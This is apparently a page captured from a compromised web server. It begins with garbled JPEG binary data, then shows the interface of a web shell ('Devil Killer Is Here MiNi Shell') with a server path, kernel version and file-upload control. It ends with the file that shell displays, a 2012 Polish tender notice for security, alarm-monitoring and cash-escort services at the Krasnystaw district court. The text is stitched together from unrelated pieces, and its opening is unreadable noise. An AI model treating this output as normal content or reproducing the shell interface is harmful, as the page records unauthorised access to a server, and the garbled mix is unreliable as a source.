JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/476130-N-2012.html

<p class="kh_header"><b>Krasnystaw: Usługi bezpośredniej ochrony fizycznej osób i mienia Sądu Rejonowego w Krasnymstawie, monitorowanie i rejestracja pracy systemów SWiN i SAP, usługa zabezpieczenia technicznego oraz usługi konwojowe</b><br>
<b>Numer ogłoszenia: 476130 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy , ul. Poniatowskiego 31, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762801, faks 082 5763305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnystaw.sr.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.krasnystaw.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi bezpośredniej ochrony fizycznej osób i mienia Sądu Rejonowego w Krasnymstawie, monitorowanie i rejestracja pracy systemów SWiN i SAP, usługa zabezpieczenia technicznego oraz usługi konwojowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1. świadczenie usług bezpośredniej ochrony fizycznej osób i mienia Sądu Rejonowego w Krasnymstawie, ul. Poniatowskiego 31, w okresie od 01 stycznia 2013 r. do 31 grudnia 2013 r. Usługa świadczona będzie w sposób ciągły, w poniedziałki w godzinach od 7:00 do 18:00, zaś od wtorku do piątku w godzinach od 7:00 do 16:00, pięć dni w tygodniu. Przez okres realizacji zamówienia usługa ta wykonywana będzie przez dwóch licencjonowanych pracowników ochrony fizycznej Wykonawcy świadczącego usługi w zakresie ochrony osób i mienia, spełniającego wymogi określone w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia  (tj. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.). Dobowy wymiar czasu pracy każdego z nich nie będzie przekraczał 8 godzin i będzie przedstawiał się w sposób następujący:
a)	w poniedziałki:
-	jeden pracownik ochrony w godzinach 7:00 - 15:00,
-	drugi pracownik ochrony  godzinach 10:00 - 18:00,
b)	od wtorku do piątku:
-	jeden pracownik ochrony w godzinach 7:00 - 15:00,
-	drugi pracownik ochrony  godzinach 8:00 - 16:00.
1.1. Pracowników ochrony winna cechować wysoka kultura osobista, miła powierzchowność, pozytywne nastawienie do otoczenia, odpowiednia sprawność fizyczna, umiejętność działania w dyskretny, niekolidujący z funkcjonowaniem jednostki sposób, komunikatywność oraz odpowiednia prezencja (estetyczne i funkcjonalne umundurowanie).  
1.2. Szczegółowy zakres czynności objętych usługą ochrony obejmuje:
1) działanie mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników Zamawiającego i innych osób znajdujących się na terenie obiektu,
2) działania zapobiegające przestępstwom i wykroczeniem przeciwko mieniu, w szczególności włamaniom, kradzieżom lun innym formom wyprowadzania mienia poza strefę kontrolowaną, przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń,
3) kontrolowanie osób wchodzących i wychodzących do lub z budynku, ich bagaży, wnoszonych urządzeń i sprzętu, identyfikatorów, nie wpuszczanie do budynku osób będących pod wpływem alkoholu lub środków odurzających,
4) obserwowanie sygnalizatorów powstania alarmu, a w przypadku jego zaistnienia udanie się do miejsca, z którego został wywołany alarm i zapewnienie tam bezpieczeństwa, Wykonawca powinien na bieżąco informować o zaistniałych zdarzeniach, zarówno z central alarmowych jak i przeciwpożarowych odpowiednio Policję, Straż Pożarną lub inne służby oraz odnotować to w dzienniku służby; 
5) obsługę systemów alarmowych tj. kontrolowanie monitorów i nagrywanie obrazów ze wszystkich kamer za pomocą urządzeń rejestrujących obraz oraz archiwizowanie nagrania rejestratorów cyfrowych przez okres 30 dni;
6) ochrona parkingu wraz ze znajdującymi się na nim pojazdami, w tym również kontrolowanie czy na terenie parkingu nie znajdują się pojazdy nieuprawnione do parkowania,
7) stałe prewencyjne obchody obiektu, wszystkich korytarzy, klatek schodowych oraz terenu wokół budynku,   
8) udzielanie informacji interesantom i kierowanie ich do właściwych komórek organizacyjnych,
9) ochrona obiektu przed wszystkimi działaniami niepożądanymi, zwłaszcza ze strony osób trzecich, a w szczególności zapobieganie zakłóceniom porządku, zbiegowiskom i działaniom osób zakłócających pracę, kontrola pod względem możliwości wyrządzania szkód, tj. sabotażu, aktów samowoli itp.,
10) natychmiastowe działanie w/w przypadkach,
11) po zakończeniu pracy Zamawiającego sprawdzenie wszystkich korytarzy, wejść i wyjść i ustalenie, czy na terenie obiektu nie pozostały osoby nieupoważnione,
12) dokonywanie zatrzymań osób schwytanych na gorącym uczynku przestępstwa albo podejrzanych o popełnieni przestępstwa na terenie obiektu, jeżeli zachodzi obawa ucieczki, zatarcia śladów  lub nie jest ustalona tożsamość tych osób. Zatrzymanie może odbyć się wyłącznie w celu bezzwłocznego przekazania odpowiednim organom,
13) niezwłoczne informowanie upoważnionych pracowników Zamawiającego o wszelkich zdarzeniach zaistniałych na terenie obiektu,
14) prowadzenie książki dozoru i raportów z przebiegu służby, w sposób umożliwiający stwierdzenie godziny rozpoczęcia i zakończenia dyżuru przez każdą osobę świadczącą usługi ochrony osób i mienia.
1.3. Obowiązki pracownika ochrony.
Pracownik ochrony zobowiązany jest:
1) stawić się w pracy w stanie gwarantującym należyte wykonanie obowiązków,
2) nosić w widocznym miejscu identyfikator służbowy i napis -OCHRONA-,
3) wobec osób trzecich zachowywać się powściągliwie i bez poufałości,
4) interweniować stanowczo, nie przekraczając ogólnie przyjętych norm taktu i kultury,
5) pełnić służbę w wyznaczonym miejscu i czasie,
6) wykonywać powierzone czynności z należytą starannością,
7) działać zgodnie z obowiązującymi przepisami prawa.
Kategorycznie zabrania się w czasie służby:
1) spożywania alkoholu,
2) przystępowania do służby po spożyciu alkoholu,
3) informowania osób postronnych o przebiegu służby i o zaistniałych zdarzeniach,
4) podejmowania podczas służby towarzyskich rozmów i dyskusji z innymi pracownikami sądu. 
1.4. Zamawiający zapewni pracownikom ochrony zatrudnionym przez Wykonawcę dostęp do pomieszczenia socjalnego w miejscu wykonywania zamówienia oraz możliwość korzystania z linii telefonicznej w celach związanych z wykonywaniem zamówienia.
1.5. Wymagania szczególne dotyczące pracowników ochrony:
- pracownicy ochrony winni być wyposażeni w środki przymusu bezpośredniego  i środki łączności bezpośredniej,
- wszyscy pracownicy ochrony zatrudnienie na potrzeby wykonywania niniejszego zamówienia winni być umundurowani w sposób schludny, jednolity i wyposażeni w imienny identyfikator.
1.6. Wykonawca zapewni zastępstwo służb ochrony w przypadku zwolnień lekarskich i urlopów, przedstawiając Zamawiającemu do akceptacji dane dotyczące pracownika ochrony pełniącego zastępstwo.
2. usługi monitorowania i rejestracji pracy systemów sygnalizacji włamania i napadu (SSWiN), oraz  sygnalizacji pożaru (SAP) działającego w Sądzie Rejonowym w Krasnymstawie za pośrednictwem łączy telefonicznych lub radiowych. Zamawiający posiada jeden system sygnalizacji włamania i napadu oraz jedną centralę pożarową. 
2.1. Wykonawcy zostanie powierzony obowiązek monitorowania do własnego centrum monitorowania alarmów, sygnału z systemów SSWiN i  alarmów pożarowych SAP. Usługa ta winna być świadczona całodobowo. 
2.2.W przypadku odebrania sygnału alarmowego Wykonawca będzie zobowiązany wysłać niezwłocznie na teren obiektu grupę interwencyjną. Przyjazd grupy interwencyjnej powinien nastąpić w czasie nie dłuższym niż 15 minut. Zadaniem grupy interwencyjnej jest przyjazd do obiektu i przerwanie działalności przestępczej na terenie obiektu. 
2.3. W przypadku odebrania sygnał alarmowego z systemu sygnalizacji pożaru, Wykonawca powinien potwierdzić jego autentyczność i w przypadku zaistnienia zagrożenia pożarowego powiadomić Straż Pożarną i kierownika Oddziału Administracyjnego. Prace związane z ochrona przeciwpożarową powinny być świadczone zgodnie z ustawą z dnia 24 sierpnia 1991 r. o ochronie przeciwpożarowej (tj. Dz. U. z 2009 r. Nr 178, poz. 1380 z późn. zm.).
3. usługa zabezpieczenia technicznego polegająca na konserwacji systemów: sygnalizacji włamania i napadu (SSWiN), systemu monitorowania wizyjnego (CCTV), systemu sygnalizacji alarmu pożarowego (SAP) oraz urządzeń w postaci detektora metalu - bramki METEOR 200, SN 384518 oraz ręcznego detektora metalu PD-140.  
3.1. Konserwacja powinna obejmować swym zakresem okresowe przeglądy w/w systemów oraz urządzeń i powinna być przeprowadzona przez osobę posiadającą licencję dotyczącą zabezpieczenia technicznego i polegać między innymi na oględzinach zewnętrznych oraz sprawdzeniu poprawności i skuteczności działania. Z uwagi na to, że Zamawiający nie znajduje się ewidencji obszarów i urządzeń podlegających obowiązkowej ochronie w świetle przepisów ustawy z dnia 22 sierpnia 2002 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221z późn. zm.), Zamawiający nie wymaga aby Wykonawca posiadał koncesję na ochronę osób i mienia w zakresie zabezpieczenia technicznego. 
3.2. Z przeprowadzonych przeglądów konserwacyjnych Wykonawca będzie zobowiązany sporządzić protokół stwierdzający stan techniczny systemów i urządzeń. Przeglądy powinny być przeprowadzone w terminach:
a) do 31 stycznia 2013 r.
b) do 30 kwietnia 2013 r.
c) do 31 lipca 2013 r.
d) do 31 października 2013 r. 
3.3. Protokoły z przeglądów konserwacyjnych powinny być przedstawione kierownikowi Oddziału Administracyjnego najpóźniej do  dnia 15-go następnego miesiąca, w którym dokonano przeglądu. Niedotrzymanie w/w terminów będzie traktowane przez Zamawiającego jako niedotrzymanie warunków umowy. Stwierdzone uszkodzenia lub nieprawidłowości w działaniu systemów  lub urządzeń może nastąpić podczas przeprowadzania konserwacji lub normalnej, codziennej eksploatacji. Po otrzymaniu informacji o nieprawidłowym działaniu któregokolwiek z systemów alarmowych, Wykonawca powinien stwierdzić przyczynę nieprawidłowości, usunąć ją lub przedstawić kosztorys naprawy. Naprawa uszkodzenia nastąpi po zapoznaniu się z kosztorysem, jego zaakceptowaniu i ewentualnym zleceniu wykonania naprawy. 
4. usługi konwojowe polegające na codziennym konwojowaniu kasjera z gotówką z budynku Sądu Rejonowego w Krasnymstawie, ul. Poniatowskiego 31, do Banku PeKaO S.A. Oddział w Krasnymstawie, ul. Piłsudskiego 11 (odległość ok. 1 km) i z powrotem, od poniedziałku do piątku o ustalonej godzinie. 
4.1. Wysokość transportowanych wartości pieniężnych nie przekroczy 0,04 jednostki obliczeniowej, o której mówi § 1 pkt 5 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 14 października 1998 r. w sprawie szczegółowych zasad i wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (Dz. U. Nr 129, poz. 858 z późn. zm.). 
4.2. Do obowiązków konwojującego pracownika ochrony należy zapewnienie kasjerowi bezpieczeństwa (ochrona przed kradzieżą, rabunkiem, zniszczeniem i zaginięciem) od chwili przyjęcia opieki nad kasjerem i mieniem do momentu przekazania go w miejscu przeznaczenia. Przewidywana ilość konwojów w ciągu 12 miesięcy - 251, przy czym zamawiający zastrzega sobie możliwość zmniejszenia ilości usług o 10%.
5. Wykonawca odpowiadać będzie wobec Zamawiającego za wszelki szkody wyrządzone Zamawiającemu przez personel Wykonawcy oraz osoby trzecie w przypadku niedołożenia przez personel Wykonawcy należytej staranności przy wykonywaniu usług..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9, 98.34.11.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usług ochrony osób i mienia, monitorowania i rejestracji pracy SSWiN iSAP oraz usług konwojowych, jeżeli Wykonawca złoży aktualną koncesję Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, wydaną zgodnie z przepisami ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.). Okres ważności koncesji nie może być krótszy niż okres realizacji przedmiotowego zamówienia. 
2. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usługi  zabezpieczenia technicznego, jeżeli Wykonawcy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 uPzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usług ochrony osób i mienia, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę o wartości min. 30 000 zł brutto (7 315,64 euro dla podmiotów zagranicznych ubiegających się o udzielenie zamówienia*), polegającą na ochronie obiektów użyteczności publicznej**, w sposób ciągły, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że zostały wykonane lub są wykonywane należycie.
2. Zamawiający uzna, że powyższy warunek został spełniony  w przypadku usługi monitorowania i rejestracji pracy SSWiN i SAP, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę o wartości min. 3 000 zł każda (731,56 euro dla podmiotów zagranicznych ubiegających się o udzielenie zamówienia*), polegającą na monitorowaniu pracy systemów sygnalizacji włamania i napadu w obiektach użyteczności publicznej**, w sposób ciągły, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że zostały wykonane lub są wykonywane należycie.
3. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usługi  zabezpieczenia technicznego, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę o wartości min. 3 000 zł każda (731,56 euro dla podmiotów zagranicznych ubiegających się o udzielenie zamówienia*), polegającą na konserwacji systemów sygnalizacji włamania i napadu, dozoru wizyjnego, czy też systemu sygnalizacji pożaru w obiektach użyteczności publicznej**, w sposób ciągły, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że zostały wykonane lub są wykonywane należycie.
4. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usług konwojowych, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę o wartości min. 5 000 zł każda (1 219,27 euro dla podmiotów zagranicznych ubiegających się o udzielenie zamówienia*), polegającą  na konwojowaniu wartości pieniężnych, w sposób ciągły, przez okres co najmniej 12 miesięcy, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączy dokumenty potwierdzające, że zostały wykonane lub są wykonywane należycie.
*wartość podana w walucie euro przeliczona została według średniego kursu ogłoszonego przez Prezesa NBP w dniu wszczęcia postępowania tj.28.11.2012 r.
 **budynek użyteczności publicznej - budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej i socjalnej, obsługi bankowej, handlu, gastronomii, usług turystyki i sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym, także budynek biurowy i socjalny (§ 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usług ochrony osób i mienia, monitorowania i rejestracji pracy SSWiN i SAP oraz usług konwojowych, jeżeli Wykonawca  złoży oświadczenie, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane licencje I lub II stopnia pracownika ochrony fizycznej, zgodnie z ustawą z dnia 2 sierpnia 1997 r. o ochroni osób i mienia  (tj. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.),
2. Zamawiający uzna, że powyższy warunek został spełniony w przypadku usługi  zabezpieczenia technicznego, jeżeli Wykonawca  złoży oświadczenie, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane licencje zabezpieczenia technicznego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnystaw.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Krasnymstawie 
ul. Poniatowskiego 31, 22-300 Krasnystaw
pokój Nr 104, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2012 godzina 11:00, miejsce: Sąd Rejonowy w Krasnymstawie 
ul. Poniatowskiego 31, 22-300 Krasnystaw
pokój Nr 104, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





